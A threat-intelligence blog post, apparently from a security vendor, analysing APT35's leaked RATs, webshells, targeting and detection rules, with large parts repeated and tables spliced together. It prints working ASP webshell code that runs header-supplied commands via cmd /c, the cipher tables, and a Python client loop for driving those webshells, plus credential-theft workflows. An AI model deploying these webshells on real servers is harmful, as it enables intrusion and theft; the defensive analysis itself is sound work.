Executive Summary

Episode 3 documents reveal APT35/Charming Kitten's complete malware development pipeline, including two distinct RAT families (Saqeb System and RAT-2AC2), custom webshells, training materials, and operational testing procedures. This collection represents a professional malware development operation with dedicated quality assurance, anti-detection research, and modular architecture designed for long-term persistence in Windows environments.

These documents expose the entire malware development lifecycle, from reverse engineering training materials to production deployment, including FUD testing procedures, module specifications, and operational webshell infrastructure.

‍

Analysis

Key Findings Summary

1. Malware Arsenal:

Saqeb System: Professional Windows RAT with 5 modules, FUD-focused, multi-hop C2 via TOR
RAT-2AC2: .NET-based RAT with Flask backend, VNC capability, masquerading as legitimate services
Webshells: Custom m0s.asp variants using Accept-Language header covert channel and substitution cipher
Support Tools: Encryptor V1, phishing kits (Google Drive lures), training materials

2. Operational Scale:

300+ compromised entities (stated by APT35)
6+ countries targeted (UAE, Jordan, Turkey, Israel, Egypt, Saudi Arabia)
Multiple confirmed breaches: FlyDubai, Dubai Police, Jordan Desert Tourism, Eposta, plus all Episode 1-2 victims
Long-term operations: 2022-2025 documented activity

3. Sophistication Level:

Advanced development: Native code (C/C++), modular architecture, professional QA/testing
Anti-detection focus: FUD lab, systematic AV evasion, anti-debug/anti-VM, string obfuscation
Operational security: Multi-hop C2, TOR integration, relay servers, traffic encryption
Quality documentation: Complete manuals, training curricula, operational reports

4. Strategic Objectives:

Regional intelligence: Airport/hotel databases, law enforcement, SCADA systems
Anti-Israel operations: Moses' Staff ransomware group, 300+ sites prepped for attacks
Influence campaigns: Black Flags, Zion 24, "Israel, The Fragile Mirror"
Axis of Resistance support: CCTV sharing, intelligence coordination, regional alliance

‍

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

Name: Saqeb System (ساماه ثاقب)
Organization: Ofogh Media Institute (موسسه رسانه ای افق)
Classification: Advanced Windows RAT with modular architecture
Target Platform: Windows (all versions)
Development Language: C++ (Native code - non-.NET dependent)
Architecture: Two-part system (Agent + Command Panel)

Agent Specifications:

Programming Language: C++ (Native)
Compilation: Visual Studio 2015
Runtime: Multi-threaded (/MT flag)
Dependencies: Framework-independent (native code)
Anti-Detection: FUD-focused design
Communication: HTTP/HTTPS with XOR encryption

Modular Structure (5 Components):

Module Filename	Functionality	Technical Details
`central.dat`	Main program updater	Latest version of `main.exe` for remote updates
`creds.dat`	Firefox credential stealer	Targets Firefox 64-bit, uses `nss3.dll` functions
`lock.dat`	File encryption/destruction	Random byte overwriting, irreversible
`logging.dat`	Keylogger	Supports Hebrew/English, hooks keyboard events
`msg.dat`	Telegram session stealer	Extracts `D877F783D5D3EF8C`s, `key_datas` files

Command & Control Panel

Panel Technology Stack:

Platform: Web-based (TOR hidden service)
Backend: Not specified (likely PHP/Python)
Access: Username/password + CAPTCHA
Communication: HTTP over TOR
Default Interval: 20 seconds (configurable)

‍

Panel Capabilities:

Feature	Description	Technical Implementation
Client Management	View online/offline clients	Real-time status polling
File Explorer	Browse/download/upload files	Access-level dependent
Command Execution	Windows CMD commands	Real-time result return
Screenshot Capture	Desktop image retrieval	GDI-based capture
Keylogger Control	Start/stop key logging	Disk-based encrypted storage
Stealer Modules	Firefox/Telegram extraction	On-demand module delivery
Auto-Run Scheduling	Daily/weekly persistence	Configurable execution times
Remote Update	Agent version updates	`central.dat` replacement
Self-Destruct	Complete removal	`"Kill RAT"` function

Panel UI Features (from manual):

- Add New Client: Creates unique password-protected ZIP agent

- Serial Number: Unique identifier per agent (e.g., 337E81E3BA4B)

- Status: Online/Offline/STOP states

- Interval Slider: Adjust callback frequency (seconds)

- History Logs: Command execution tracking with timestamps

- User Management: Multi-user access control

- Lock Screen: Panel security feature

- CSV Export: Command results extraction

‍

Execution Flow:

1. Download lock.dat from server (hex-encoded)

2. Decode to rns.dll

3. Create BAT file with rundll32 command

4. Execute BAT → rundll32 loads rns.dll

5. Call snrProc() function

6. Random byte destruction on accessible files

Session Hijacking Workflow:

1. Search disk for Telegram folder

2. Locate session files

3. Base64 encode all files

4. Transmit to C2

5. Attacker replaces files on new system

6. Gain Telegram access (if no Cloud Password)

‍

B. RAT-2AC2 - Secondary RAT Platform

Overview

Development: C# language + .NET Framework 4
Server: Python + Flask Version 2
Protocol: HTTP/HTTPS
Architecture: Client-Server with API-based registration
Infrastructure: Supports DNS forwarding and multiple relays

Technical Specifications

Client (Agent):

Language: C#
Framework: .NET 4.0 (Managed code)
Platform: Windows
Communication: HTTP REST API
Authentication: Header-based token
Status Reporting: Every 5 seconds
Initial Command: systeminfo execution

Server (Panel):

Language: Python 3.x
Framework: Flask 2.x
OS Recommendation: Linux Debian
Installation: pip3 install -r requirement.txt
Execution: python3 app.py
Configuration: Final line of app.py (address/port)

API Endpoints

Endpoint	Method	Function	Parameters
/api	POST	Initial client registration	IP, OS, CPU, RAM, AV, .NET, DOMAIN, POWERSHELL, USERNAME, PYTHON_VERSION, COUNTRY
/cmd/<id>	GET	Retrieve commands for client	Client ID
/panel	GET	Web panel access	Requires header token + login
/login	POST	Authentication	Username, Password
/keylogger	POST	Keylogger results	Client ID, logged data
/vncLauncher	POST	Initialize VNC	Triggers bore/noVNC setup
/vncConnect	GET	Connect to VNC	Opens browser connection
/vncTerminate	POST	Stop VNC	Kills novncproxy/bore
/file	POST	File upload to server	File data
/command	POST	Register command	Client ID, command string
/result	POST	Command result	Client ID, result data
/log	GET	Command history	All logged commands
/download	GET	Download file from client	Path parameter
/delete	POST	Delete client	Client ID
/SysInfo	POST	System information	Full systeminfo output
/uploadInDatabase	POST	Upload file to client	File + path

Security Implementation

Authentication Flow:

1. Client sends API request with header token

2. Server validates token

3. If valid, assigns unique ID

4. Client uses ID for all subsequent requests

5. Commands retrieved via /cmd/<id>

Capabilities

Remote Access:

VNC: Browser-based via noVNC + bore.pub tunneling
Command Execution: Windows CMD shell
Keylogging: Background keyboard capture with file storage
Screenshot: Desktop image capture
File Management: Upload/download with path specification

VNC Architecture:

1. Client downloads bore software

2. Sets up noVNC server

3. Executes port forward via bore

4. Sends bore.pub address + port to server

5. Operator connects via browser

6. Terminate via vncTerminate (kills all services)

File Operations:

Download from Client:

1. Command: DOWNLOAD=/path/to/file

2. Client reads file → Base64 encode → Send to server

3. Server stores file → Displays in panel

4. Access level dependent on client privileges

Upload to Client:

1. Upload file to server via /file

2. Register command: UPLOAD=/path/to/file/filename.ext

3. Client downloads from server

4. Client writes file to specified path

Keylogger Workflow:

1. Server sends "keylogger" command

2. Panel button turns red (waiting)

3. Client starts logging to disk file

4. Results sent periodically to server

5. Panel button turns blue (data received)

6. Click button to view results

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

Language: Classic ASP (VBScript)
Method: HTTP Header-based command channel
Encoding: Custom substitution cipher
Execution: WScript.Shell command execution

Technical Implementation

Command Channel:

asp

' Read Accept-Language header

cmdEncoded = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

' Decode via custom cipher

cmdDecoded = DecodeFunction(cmdEncoded)

‍

' Execute command

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmdDecoded)

‍

' Return STDOUT

Response.Write objExec.StdOut.ReadAll()

Substitution Cipher:

Encoding Table (EN):

AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/

Decoding Table (DE):

Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ

Decode Function Logic:

For each character in encoded string:
- Find position in DE table
- Replace with character at same position in EN table
- Append to decoded string
Return decoded command

Operational Use

Client Scripts (Python):

python

# connect.py, RCE4.py, rce5.py pattern

‍

import requests

‍

# Hardcoded target URLs (examples from artifacts)

targets = [

"https://<domain>/images/flash/test9/m0s.phto",

"http://<IP>/images/m0s.php",

"http://<domain>/CMS/Uploads/m0s.aspx"

]

‍

# Encoding function (mirrors ASP decoder)

def encode_command(cmd):

en = "AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"

de = "Qk3\\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ"

trans = str.maketrans(en, de)

return cmd.translate(trans)

‍

# Interactive loop

while True:

cmd = input("CMD> ")

encoded = encode_command(cmd)

headers = {

"Accept-Language": encoded,

"Accept-Captcha": "[predefined value]",

"User-Agent": "Mozilla/5.0..."

}

response = requests.get(target_url, headers=headers)

print(response.text)

B. file.asp / webshell.asp - Simpler Variants

Implementation

asp

' Direct command execution (no encoding)

cmd = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmd)

‍

Response.Write objExec.StdOut.ReadAll()

Aim: Full RCE with IIS worker process privileges, no authentication, direct header-to-shell execution.

‍

3. Target Intelligence

A. Targeting Pattern Analysis

Geographic Focus:

Primary: UAE (2 confirmed: FlyDubai, Dubai Police)
Secondary: Jordan (1 confirmed: Tourism sector)
Tertiary: Turkey (1 confirmed: Email provider)
Active: Israel (folder structure confirms)

Active: Egypt (folder structure confirms)

Sector Targeting:

Aviation: FlyDubai
Law Enforcement: Dubai Police
Tourism: Jordan Desert
Communications: Eposta

Strategic Pattern:

Critical Infrastructure: Aviation sector
Intelligence Goldmine: Law enforcement systems
Economic Intelligence: Tourism (visitor tracking)
Communications Surveillance: Email providers

B. SCADA/Industrial Targeting (from #78TPDD report)

Stated Capabilities:

"Establishing access to industrial infrastructures and extracting SCADA domain information for utilization in offensive cyber operations"

Implications:

Active SCADA reconnaissance ongoing
Information collection for future attacks
Offensive capability development
Critical infrastructure targeting

Potential Targets (based on regional focus):

Oil & gas facilities (UAE, Saudi Arabia)
Water treatment plants (mentioned: National Water Company access in Episode 2)
Power generation/distribution
Desalination plants (critical UAE infrastructure)
Airport systems (FlyDubai access point)

C. Ransomware Scale (from #78TPDD report)

Stated Achievement:

"Establishing access on over 300 sites and companies for

ransomware attacks in line with media exploitation"

Analysis:

300+ compromised entities: Massive access inventory
Ransomware ready: Pre-positioned for deployment
Media weaponization: Attacks timed for psychological impact
Moses' Staff group: Public attribution for operations

Moses' Staff Operations:

Tactics: Ransomware + data leaks
Target: "Zionist regime" (Israel)
Media Strategy: Global news network coverage
Purpose: "Breaking hollow dominance in cyber capability"

‍

4. Detection & Prevention Guidance

Behavioral Detection

Saqeb Behavioral Pattern:

‍

Triggers:

1. Process creates mutex via CreateEventA()

2. AND loads library from .dat file (LoadLibrary on non-PE extension)

3. AND makes HTTPS connections with XOR-encrypted payloads

4. AND exhibits one of:

- Keyboard hooking (SetWindowsHookEx WH_KEYBOARD_LL)

- File enumeration at disk root level

- Multiple small network transmissions with delays

- Firefox profile directory access (logins.json)

- Telegram folder access (D877F783D5D3EF8Cs)

‍

Severity: CRITICAL

Response: Isolate, collect memory dump, alert SOC

RAT-2AC2 Behavioral Pattern:

Rule: APT35_RAT2AC2_Behavior

‍

Triggers:

1. .NET executable with service-like name runs from non-standard location

2. AND makes HTTP POST to /api endpoint with system enumeration data

3. AND polls /cmd/<id> endpoint every 5-10 seconds

4. AND exhibits one of:

- Downloads bore.pub software

- Starts noVNC service

- Executes systeminfo command

- Creates files in Base64 format

- Port forwarding activity

‍

Severity: CRITICAL

Response: Kill process, block C2 IPs, forensic investigation

Webshell Behavioral Pattern:

Rule: APT35_Webshell_Behavior

‍

Triggers:

1. IIS worker process (w3wp.exe)

2. AND spawns cmd.exe or powershell.exe

3. AND command includes suspicious keywords:

- whoami, net user, net localgroup

- ipconfig, netstat, tasklist

- dir C:\, type [file]

- WMIC, NET USE (lateral movement)

4. AND HTTP request contained unusual Accept-Language header

‍

Severity: HIGH

Response: Block source IP, kill web process, check for persistent webshells

5. MITRE ATT&CK Mapping

References

https://github.com/KittenBusters/CharmingKitten

Author

Koushik Pal

Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.

Predict Cyber threats against your organization

Schedule a Demo

Back

Adversary Intelligence

An Insider Look At The IRGC-linked APT35 Operations: Ep3 - Malware Arsenal & Tooling

APT35 (Charming Kitten) operates a professional malware ecosystem featuring Saqeb System and RAT-2AC2 RATs, custom webshells, and FUD-tested modules. The group’s C2 uses TOR, multi-hop relays, and encrypted traffic for persistence and stealth. Targeting airlines, law enforcement, and regional infrastructure (2022-2025), it links cyber operations to IRGC geopolitical objectives

October 14, 2025

min

Table of Content

Example H2

Executive Summary

‍

Analysis

Key Findings Summary

1. Malware Arsenal:

Saqeb System: Professional Windows RAT with 5 modules, FUD-focused, multi-hop C2 via TOR
RAT-2AC2: .NET-based RAT with Flask backend, VNC capability, masquerading as legitimate services
Webshells: Custom m0s.asp variants using Accept-Language header covert channel and substitution cipher
Support Tools: Encryptor V1, phishing kits (Google Drive lures), training materials

2. Operational Scale:

300+ compromised entities (stated by APT35)
6+ countries targeted (UAE, Jordan, Turkey, Israel, Egypt, Saudi Arabia)
Multiple confirmed breaches: FlyDubai, Dubai Police, Jordan Desert Tourism, Eposta, plus all Episode 1-2 victims
Long-term operations: 2022-2025 documented activity

3. Sophistication Level:

Advanced development: Native code (C/C++), modular architecture, professional QA/testing
Anti-detection focus: FUD lab, systematic AV evasion, anti-debug/anti-VM, string obfuscation
Operational security: Multi-hop C2, TOR integration, relay servers, traffic encryption
Quality documentation: Complete manuals, training curricula, operational reports

4. Strategic Objectives:

Regional intelligence: Airport/hotel databases, law enforcement, SCADA systems
Anti-Israel operations: Moses' Staff ransomware group, 300+ sites prepped for attacks
Influence campaigns: Black Flags, Zion 24, "Israel, The Fragile Mirror"
Axis of Resistance support: CCTV sharing, intelligence coordination, regional alliance

‍

Malware Family Analysis

A. Saqeb System - Primary Windows RAT

Overview

Name: Saqeb System (ساماه ثاقب)
Organization: Ofogh Media Institute (موسسه رسانه ای افق)
Classification: Advanced Windows RAT with modular architecture
Target Platform: Windows (all versions)
Development Language: C++ (Native code - non-.NET dependent)
Architecture: Two-part system (Agent + Command Panel)

Agent Specifications:

Programming Language: C++ (Native)
Compilation: Visual Studio 2015
Runtime: Multi-threaded (/MT flag)
Dependencies: Framework-independent (native code)
Anti-Detection: FUD-focused design
Communication: HTTP/HTTPS with XOR encryption

Modular Structure (5 Components):

Tactic	Technique	Sub-Technique	Evidence	Malware
Initial Access	T1566 - Phishing	T1566.001 - Spearphishing Attachment	Google Drive phishing kit with .rar files	All campaigns
Initial Access	T1190 - Exploit Public-Facing Application		Webshell deployment on web servers	m0s.asp variants
Execution	T1059 - Command and Scripting Interpreter	T1059.001 - PowerShell	Webshell cmd execution	m0s.asp, RAT-2AC2
Execution	T1059.003 - Windows Command Shell		cmd /c execution via WScript.Shell	m0s.asp, file.asp
Execution	T1204 - User Execution	T1204.002 - Malicious File	Phishing attachments, malware executables	Saqeb, RAT-2AC2
Execution	T1106 - Native API		CreateEventA, LoadLibrary, GetProcAddress	Saqeb main
Persistence	T1543 - Create or Modify System Process	T1543.003 - Windows Service	Service masquerading (WinUpdateService.exe, etc.)	RAT-2AC2
Persistence	T1547 - Boot or Logon Autostart Execution	T1547.001 - Registry Run Keys	Auto-run scheduling (daily/weekly)	Saqeb
Persistence	T1505 - Server Software Component	T1505.003 - Web Shell	m0s.asp, file.asp, webshell.asp deployed	Webshells
Privilege Escalation	T1543 - Create or Modify System Process	T1543.003 - Windows Service	Elevated service creation	RAT-2AC2
Defense Evasion	T1027 - Obfuscated Files or Information	T1027.002 - Software Packing	Hex encoding of modules (bin2hex.py)	Saqeb modules
Defense Evasion	T1027.007 - Dynamic API Resolution		LoadLibrary + GetProcAddress at runtime	Saqeb main
Defense Evasion	T1140 - Deobfuscate/Decode Files or Information		Runtime hex decoding, XOR decryption, string deobfuscation	Saqeb, webshells
Defense Evasion	T1036 - Masquerading	T1036.004 - Masquerade Task or Service	Legitimate service names (Microsoft, Exchange, Windows)	RAT-2AC2
Defense Evasion	T1036.008 - Masquerade File Type		.dat extensions for DLLs	Saqeb modules
Defense Evasion	T1070 - Indicator Removal	T1070.004 - File Deletion	Self-destruct capability ("Kill RAT")	Saqeb
Defense Evasion	T1112 - Modify Registry		Registry manipulation for persistence (minimal to avoid detection)	Saqeb
Defense Evasion	T1497 - Virtualization/Sandbox Evasion		Anti-VM techniques (training curriculum Section 8)	All malware
Defense Evasion	T1622 - Debugger Evasion		Anti-debug mechanisms	Saqeb (documented in manual)
Defense Evasion	T1562 - Impair Defenses	T1562.001 - Disable or Modify Tools	AV exclusion paths in file destruction module	rns.dll
Credential Access	T1555 - Credentials from Password Stores	T1555.003 - Credentials from Web Browsers	Firefox password extraction (nss3.dll abuse)	stler.dll (creds.dat)
Credential Access	T1552 - Unsecured Credentials	T1552.001 - Credentials In Files	Telegram session file theft	telg.dll (msg.dat)
Credential Access	T1056 - Input Capture	T1056.001 - Keylogging	SetWindowsHookEx keyboard hooking	klg.dll (logging.dat)
Discovery	T1082 - System Information Discovery		systeminfo command execution	RAT-2AC2, webshells
Discovery	T1083 - File and Directory Discovery		Disk-level file enumeration (Fexp function)	Saqeb main
Discovery	T1057 - Process Discovery		Process enumeration capabilities	All RATs
Discovery	T1033 - System Owner/User Discovery		whoami, username collection	All malware
Discovery	T1016 - System Network Configuration Discovery		ipconfig, network enumeration	Webshells, RATs
Discovery	T1049 - System Network Connections Discovery		netstat commands	Webshells
Discovery	T1518 - Software Discovery	T1518.001 - Security Software Discovery	AV detection (Kaspersky, BitDefender exclusions)	Saqeb, RAT-2AC2
Lateral Movement	T1021 - Remote Services	T1021.006 - Windows Remote Management	WMIC commands in webshell scripts	RCE4.py comments
Lateral Movement	T1080 - Taint Shared Content		File upload to UNC shares	Webshell comments (vmware-tools.exe example), connect.py
Collection	T1005 - Data from Local System		File download capabilities, Firefox/Telegram data extraction	Saqeb, RAT-2AC2
Collection	T1113 - Screen Capture		Screenshot functionality (capHandler)	Saqeb, RAT-2AC2
Collection	T1119 - Automated Collection		Automated file enumeration and exfiltration	Saqeb
Collection	T1056 - Input Capture	T1056.001 - Keylogging	Keyboard hook with window title logging	klg.dll
Command & Control	T1071 - Application Layer Protocol	T1071.001 - Web Protocols	HTTP/HTTPS C2 communication	All malware
Command & Control	T1132 - Data Encoding	T1132.001 - Standard Encoding	XOR encryption, Base64, hex encoding, substitution cipher	All malware
Command & Control	T1573 - Encrypted Channel	T1573.001 - Symmetric Cryptography	XOR-based traffic encryption	Saqeb
Command & Control	T1090 - Proxy	T1090.003 - Multi-hop Proxy	Relay servers + TOR (7 hops)	Saqeb
Command & Control	T1095 - Non-Application Layer Protocol		TOR network usage (.onion addresses)	Saqeb
Command & Control	T1571 - Non-Standard Port		Webshells on ports 9003, various custom ports	Episodes 1-2 evidence
Command & Control	T1001 - Data Obfuscation	T1001.002 - Steganography	Covert channel via Accept-Language header	m0s.asp variants
Command & Control	T1105 - Ingress Tool Transfer		Module download from C2 (dwPlugin function)	Saqeb
Exfiltration	T1041 - Exfiltration Over C2 Channel		Data exfiltration via HTTP POST	All malware
Exfiltration	T1020 - Automated Exfiltration		Scheduled data collection and transmission	Saqeb
Exfiltration	T1030 - Data Transfer Size Limits		Chunked file transfer (flwHandler)	Saqeb
Impact	T1486 - Data Encrypted for Impact

Module Filename	Functionality	Technical Details
`central.dat`	Main program updater	Latest version of `main.exe` for remote updates
`creds.dat`	Firefox credential stealer	Targets Firefox 64-bit, uses `nss3.dll` functions
`lock.dat`	File encryption/destruction	Random byte overwriting, irreversible
`logging.dat`	Keylogger	Supports Hebrew/English, hooks keyboard events
`msg.dat`	Telegram session stealer	Extracts `D877F783D5D3EF8C`s, `key_datas` files

Command & Control Panel

Panel Technology Stack:

Platform: Web-based (TOR hidden service)
Backend: Not specified (likely PHP/Python)
Access: Username/password + CAPTCHA
Communication: HTTP over TOR
Default Interval: 20 seconds (configurable)

‍

Panel Capabilities:

Feature	Description	Technical Implementation
Client Management	View online/offline clients	Real-time status polling
File Explorer	Browse/download/upload files	Access-level dependent
Command Execution	Windows CMD commands	Real-time result return
Screenshot Capture	Desktop image retrieval	GDI-based capture
Keylogger Control	Start/stop key logging	Disk-based encrypted storage
Stealer Modules	Firefox/Telegram extraction	On-demand module delivery
Auto-Run Scheduling	Daily/weekly persistence	Configurable execution times
Remote Update	Agent version updates	`central.dat` replacement
Self-Destruct	Complete removal	`"Kill RAT"` function

Panel UI Features (from manual):

- Add New Client: Creates unique password-protected ZIP agent

- Serial Number: Unique identifier per agent (e.g., 337E81E3BA4B)

- Status: Online/Offline/STOP states

- Interval Slider: Adjust callback frequency (seconds)

- History Logs: Command execution tracking with timestamps

- User Management: Multi-user access control

- Lock Screen: Panel security feature

- CSV Export: Command results extraction

‍

Execution Flow:

1. Download lock.dat from server (hex-encoded)

2. Decode to rns.dll

3. Create BAT file with rundll32 command

4. Execute BAT → rundll32 loads rns.dll

5. Call snrProc() function

6. Random byte destruction on accessible files

Session Hijacking Workflow:

1. Search disk for Telegram folder

2. Locate session files

3. Base64 encode all files

4. Transmit to C2

5. Attacker replaces files on new system

6. Gain Telegram access (if no Cloud Password)

‍

B. RAT-2AC2 - Secondary RAT Platform

Overview

Development: C# language + .NET Framework 4
Server: Python + Flask Version 2
Protocol: HTTP/HTTPS
Architecture: Client-Server with API-based registration
Infrastructure: Supports DNS forwarding and multiple relays

Technical Specifications

Client (Agent):

Language: C#
Framework: .NET 4.0 (Managed code)
Platform: Windows
Communication: HTTP REST API
Authentication: Header-based token
Status Reporting: Every 5 seconds
Initial Command: systeminfo execution

Server (Panel):

Language: Python 3.x
Framework: Flask 2.x
OS Recommendation: Linux Debian
Installation: pip3 install -r requirement.txt
Execution: python3 app.py
Configuration: Final line of app.py (address/port)

API Endpoints

Endpoint	Method	Function	Parameters
/api	POST	Initial client registration	IP, OS, CPU, RAM, AV, .NET, DOMAIN, POWERSHELL, USERNAME, PYTHON_VERSION, COUNTRY
/cmd/<id>	GET	Retrieve commands for client	Client ID
/panel	GET	Web panel access	Requires header token + login
/login	POST	Authentication	Username, Password
/keylogger	POST	Keylogger results	Client ID, logged data
/vncLauncher	POST	Initialize VNC	Triggers bore/noVNC setup
/vncConnect	GET	Connect to VNC	Opens browser connection
/vncTerminate	POST	Stop VNC	Kills novncproxy/bore
/file	POST	File upload to server	File data
/command	POST	Register command	Client ID, command string
/result	POST	Command result	Client ID, result data
/log	GET	Command history	All logged commands
/download	GET	Download file from client	Path parameter
/delete	POST	Delete client	Client ID
/SysInfo	POST	System information	Full systeminfo output
/uploadInDatabase	POST	Upload file to client	File + path

Security Implementation

Authentication Flow:

1. Client sends API request with header token

2. Server validates token

3. If valid, assigns unique ID

4. Client uses ID for all subsequent requests

5. Commands retrieved via /cmd/<id>

Capabilities

Remote Access:

VNC: Browser-based via noVNC + bore.pub tunneling
Command Execution: Windows CMD shell
Keylogging: Background keyboard capture with file storage
Screenshot: Desktop image capture
File Management: Upload/download with path specification

VNC Architecture:

1. Client downloads bore software

2. Sets up noVNC server

3. Executes port forward via bore

4. Sends bore.pub address + port to server

5. Operator connects via browser

6. Terminate via vncTerminate (kills all services)

File Operations:

Download from Client:

1. Command: DOWNLOAD=/path/to/file

2. Client reads file → Base64 encode → Send to server

3. Server stores file → Displays in panel

4. Access level dependent on client privileges

Upload to Client:

1. Upload file to server via /file

2. Register command: UPLOAD=/path/to/file/filename.ext

3. Client downloads from server

4. Client writes file to specified path

Keylogger Workflow:

1. Server sends "keylogger" command

2. Panel button turns red (waiting)

3. Client starts logging to disk file

4. Results sent periodically to server

5. Panel button turns blue (data received)

6. Click button to view results

Webshell Infrastructure

A. m0s.asp - Advanced ASP Webshell

Overview

Language: Classic ASP (VBScript)
Method: HTTP Header-based command channel
Encoding: Custom substitution cipher
Execution: WScript.Shell command execution

Technical Implementation

Command Channel:

asp

' Read Accept-Language header

cmdEncoded = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

' Decode via custom cipher

cmdDecoded = DecodeFunction(cmdEncoded)

‍

' Execute command

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmdDecoded)

‍

' Return STDOUT

Response.Write objExec.StdOut.ReadAll()

Substitution Cipher:

Encoding Table (EN):

AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/

Decoding Table (DE):

Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ

Decode Function Logic:

For each character in encoded string:
- Find position in DE table
- Replace with character at same position in EN table
- Append to decoded string
Return decoded command

Operational Use

Client Scripts (Python):

python

# connect.py, RCE4.py, rce5.py pattern

‍

import requests

‍

# Hardcoded target URLs (examples from artifacts)

targets = [

"https://<domain>/images/flash/test9/m0s.phto",

"http://<IP>/images/m0s.php",

"http://<domain>/CMS/Uploads/m0s.aspx"

]

‍

# Encoding function (mirrors ASP decoder)

def encode_command(cmd):

en = "AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"

de = "Qk3\\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5nBrn4.prWAHmIZ"

trans = str.maketrans(en, de)

return cmd.translate(trans)

‍

# Interactive loop

while True:

cmd = input("CMD> ")

encoded = encode_command(cmd)

headers = {

"Accept-Language": encoded,

"Accept-Captcha": "[predefined value]",

"User-Agent": "Mozilla/5.0..."

}

response = requests.get(target_url, headers=headers)

print(response.text)

B. file.asp / webshell.asp - Simpler Variants

Implementation

asp

' Direct command execution (no encoding)

cmd = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

‍

Set objShell = Server.CreateObject("WScript.Shell")

Set objExec = objShell.Exec("cmd /c " & cmd)

‍

Response.Write objExec.StdOut.ReadAll()

Aim: Full RCE with IIS worker process privileges, no authentication, direct header-to-shell execution.

‍

3. Target Intelligence

A. Targeting Pattern Analysis

Geographic Focus:

Primary: UAE (2 confirmed: FlyDubai, Dubai Police)
Secondary: Jordan (1 confirmed: Tourism sector)
Tertiary: Turkey (1 confirmed: Email provider)
Active: Israel (folder structure confirms)

Active: Egypt (folder structure confirms)

Sector Targeting:

Aviation: FlyDubai
Law Enforcement: Dubai Police
Tourism: Jordan Desert
Communications: Eposta

Strategic Pattern:

Critical Infrastructure: Aviation sector
Intelligence Goldmine: Law enforcement systems
Economic Intelligence: Tourism (visitor tracking)
Communications Surveillance: Email providers

B. SCADA/Industrial Targeting (from #78TPDD report)

Stated Capabilities:

"Establishing access to industrial infrastructures and extracting SCADA domain information for utilization in offensive cyber operations"

Implications:

Active SCADA reconnaissance ongoing
Information collection for future attacks
Offensive capability development
Critical infrastructure targeting

Potential Targets (based on regional focus):

Oil & gas facilities (UAE, Saudi Arabia)
Water treatment plants (mentioned: National Water Company access in Episode 2)
Power generation/distribution
Desalination plants (critical UAE infrastructure)
Airport systems (FlyDubai access point)

C. Ransomware Scale (from #78TPDD report)

Stated Achievement:

"Establishing access on over 300 sites and companies for

ransomware attacks in line with media exploitation"

Analysis:

300+ compromised entities: Massive access inventory
Ransomware ready: Pre-positioned for deployment
Media weaponization: Attacks timed for psychological impact
Moses' Staff group: Public attribution for operations

Moses' Staff Operations:

Tactics: Ransomware + data leaks
Target: "Zionist regime" (Israel)
Media Strategy: Global news network coverage
Purpose: "Breaking hollow dominance in cyber capability"

‍

4. Detection & Prevention Guidance

Behavioral Detection

Saqeb Behavioral Pattern:

‍

Triggers:

1. Process creates mutex via CreateEventA()

2. AND loads library from .dat file (LoadLibrary on non-PE extension)

3. AND makes HTTPS connections with XOR-encrypted payloads

4. AND exhibits one of:

- Keyboard hooking (SetWindowsHookEx WH_KEYBOARD_LL)

- File enumeration at disk root level

- Multiple small network transmissions with delays

- Firefox profile directory access (logins.json)

- Telegram folder access (D877F783D5D3EF8Cs)

‍

Severity: CRITICAL

Response: Isolate, collect memory dump, alert SOC

RAT-2AC2 Behavioral Pattern:

Rule: APT35_RAT2AC2_Behavior

‍

Triggers:

1. .NET executable with service-like name runs from non-standard location

2. AND makes HTTP POST to /api endpoint with system enumeration data

3. AND polls /cmd/<id> endpoint every 5-10 seconds

4. AND exhibits one of:

- Downloads bore.pub software

- Starts noVNC service

- Executes systeminfo command

- Creates files in Base64 format

- Port forwarding activity

‍

Severity: CRITICAL

Response: Kill process, block C2 IPs, forensic investigation

Webshell Behavioral Pattern:

Rule: APT35_Webshell_Behavior

‍

Triggers:

1. IIS worker process (w3wp.exe)

2. AND spawns cmd.exe or powershell.exe

3. AND command includes suspicious keywords:

- whoami, net user, net localgroup

- ipconfig, netstat, tasklist

- dir C:\, type [file]

- WMIC, NET USE (lateral movement)

4. AND HTTP request contained unusual Accept-Language header

‍

Severity: HIGH

Response: Block source IP, kill web process, check for persistent webshells

5. MITRE ATT&CK Mapping

References

https://github.com/KittenBusters/CharmingKitten

Koushik Pal

Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.

Related Blogs

Tactic	Technique	Sub-Technique	Evidence	Malware
Initial Access	T1566 - Phishing	T1566.001 - Spearphishing Attachment	Google Drive phishing kit with .rar files	All campaigns
Initial Access	T1190 - Exploit Public-Facing Application		Webshell deployment on web servers	m0s.asp variants
Execution	T1059 - Command and Scripting Interpreter	T1059.001 - PowerShell	Webshell cmd execution	m0s.asp, RAT-2AC2
Execution	T1059.003 - Windows Command Shell		cmd /c execution via WScript.Shell	m0s.asp, file.asp
Execution	T1204 - User Execution	T1204.002 - Malicious File	Phishing attachments, malware executables	Saqeb, RAT-2AC2
